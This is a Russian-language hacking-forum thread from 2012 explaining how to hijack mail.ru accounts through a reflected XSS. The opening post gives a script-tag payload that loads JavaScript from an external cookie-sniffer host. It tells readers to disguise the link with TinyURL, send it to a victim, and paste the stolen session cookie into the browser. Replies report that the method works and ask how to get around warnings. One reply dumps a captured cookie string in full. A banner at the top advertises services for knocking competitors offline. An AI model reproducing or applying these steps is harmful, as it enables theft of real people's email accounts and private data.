Взлом mail.ru с помощью пассивной xss

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
Взлом mail.ru с помощью пассивной xss

Страница 1 из 18

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

28.01.2012, 01:00

tickhack

Новичок

Регистрация: 24.01.2012

Сообщений: 11

С нами: 7526486

Репутация: -10

Привет всем я хотел рассказать как можна угнать куки на mail.ru с помощью пассивной xss.
1.Нам понадобиться Пассивка
2.Сниффер я буду использовать сниффер https://hpc.name/sniffer/
3.Мозги и руки !
Так заходим на сниффер и берём Код для пассивной XSS атаки вот он
source:

Код:

%
3CSCRIPT type=text/javascript src=http://httpz.ru/juxfbp99bcgo.js>"

мы теперь должи прекрепить его к пассивной xss после знака "> и у нас получется вот так Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Если жертва перейдёт по этой ссылке то куки придут на наш сниффер.
Но это ещё не всё ссылка слишком подазрительная мы должны её зашифровать я буду использовать сервис http://tinyurl.com/
заходим на этот сайт и где написано
source:

Код:

Enter
a
long URL
to
make tiny:

вбиваем туда нашу ядовитую ссылку и нажимаем на кнопочку
source:

Код:

make
a
TinyURL

И у нас появится ссылка http://tinyurl.com/823p5w9 ну увас может быть чучуть другая ну это не важно кидаем эту ссылку жертве и если она перейдёт по этой ссылке то её куки будут у нас.
Как заменить cokies ? настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы.
Внимание если жертва перейдёт по ссылки и выйдет из своего мыла то куки автоматически умерают.
ну чтож думаю всё !
→Видео к статье←
Пароль на видео hacker-pro.net
Автор:tickhack hacker-pro.net

𝕏 Twitter Reddit Telegram Копировать ссылку

28.01.2012, 01:00

Andorfin

Постоянный

Регистрация: 22.08.2011

Сообщений: 316

С нами: 7749686

Репутация: 4

Спасибо!)Где бы еще пассивку взять..?)

28.01.2012, 01:00

dryha_777

Новичок

Регистрация: 17.01.2012

Сообщений: 16

С нами: 7536566

Репутация: 0

Я попробывал приходит emil а пароль нет почему ?

28.01.2012, 01:00

tickhack

Новичок

Регистрация: 24.01.2012

Сообщений: 11

С нами: 7526486

Репутация: -10

Цитата:

Сообщение от dryha_777

Я попробывал приходит emil а пароль нет почему ?

на сниффер придутут cokies их надо в опере поменять на свои но только не все только од строчки mpop до строчки мыло@mail.ru:
cokies меняют так настройки\общие настройки\расширения\cokies и найти там маил.ру cokies там будет такая вкладка mpop нажимаешь на неё и в вкладке значение вбиваешь cokies жертвы

28.01.2012, 01:00

tickhack

Новичок

Регистрация: 24.01.2012

Сообщений: 11

С нами: 7526486

Репутация: -10

Цитата:

Сообщение от Andorfin

Спасибо!)Где бы еще пассивку взять..?)

Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
вот же она

28.01.2012, 01:00

Andorfin

Постоянный

Регистрация: 22.08.2011

Сообщений: 316

С нами: 7749686

Репутация: 4

Проверил,работает метода.Только окно предупреждения.Есть варики его обойти?

28.01.2012, 01:00

tickhack

Новичок

Регистрация: 24.01.2012

Сообщений: 11

С нами: 7526486

Репутация: -10

Цитата:

Сообщение от Andorfin

Проверил,работает метода.Только окно предупреждения.Есть варики его обойти?

пока незнаю но уже думаю об этом.

28.01.2012, 01:00

MOV_EAX

Участник форума

Регистрация: 10.02.2010

Сообщений: 181

С нами: 8553206

Репутация: 5

Цитата:

Сообщение от tickhack

пока незнаю но уже думаю об этом.

молоток что нашел

а обойти тут нет труда
у меня приходят куки
снифер использовал свой приватный

code:

VID=209Pg10AjVWy; mrcu=FC724F225A1A30402A7D0100007F; p=EcMGAEp owAA; b=Bjw5BEAF5QAA8rMu8EbHAHB1gunYC2K2LhDmx2CCHgOCVwy TCw4C74AJHUCUjUMhOAxsGK9IFOtghQWC8iCJ0gpyACC8MLF3x l1oCbc7Z8QeQ3CP8QgxYsm9A2gcDcdxFXfGS3JJ1x2CLGLckhb thgJ90QEAABxF3/GvdgYfatBNLycsLguwruHCL8ZI2wNoJDiIEJPTRFxOUfsfBqRh 2jCITwQj/NBdKECUdp4Qj ECPtYIkzpGbE3gMKvuQjtPyccywEhvvwPKZ/ J5hsjTEA; t=obLD1AAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAQABBAIGAIAAAAAAAgAdAQgLtgcA; mid=62ad25d4; i=AQA98yNPAgACAAUCAQATAAgEARUAAQ==; mc1=1328280937; c=3/QjTwAAEBVpCAARAAgAHgAyAvcAAAAg; odklmapi=$$8SxEBds2OmrpriJjFY2wYhUEhlrqaWwOSsWt2CH Sy7SV=c; PHPSESSID=162802d913dd017b7aed594c9eae6836; __utma=103147462.1831527631.1327777722.1327777722. 1327777722.1; __utmb=103147462; __utmc=103147462; __utmz=103147462.1327777722.1.1.utmccn=(direct)|ut mcsr=(direct)|utmcmd=(none); __utma=1.1627511399.1327777729.1327777729.13277777 29.1; __utmb=1.4.10.1327777729; __utmc=1; __utmz=1.1327777729.1.1.utmcsr=(direct)|utmccn=(di rect)|utmcmd=(none); partner_session_day=28; partner_id=1_678_60738_0__

просто ставь таким образом скрипт

PHP highlight

Код:


	Код:
	http://наша_пасивка_адрес_где_поймали_хss/register.php?referrer=">

29.01.2012, 01:00

dryha_777

Новичок

Регистрация: 17.01.2012

Сообщений: 16

С нами: 7536566

Репутация: 0

пароль какой на видео ? в архиве

#10

29.01.2012, 01:00

Yorvet

Флудер

Регистрация: 19.08.2011

Сообщений: 2,281

С нами: 7754006

Репутация: 115

Дополню: если есть проблемы с настройкой снифера, используйте удобную программу "бабай".

Страница 1 из 18

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход

Home

Help

Terms and Rules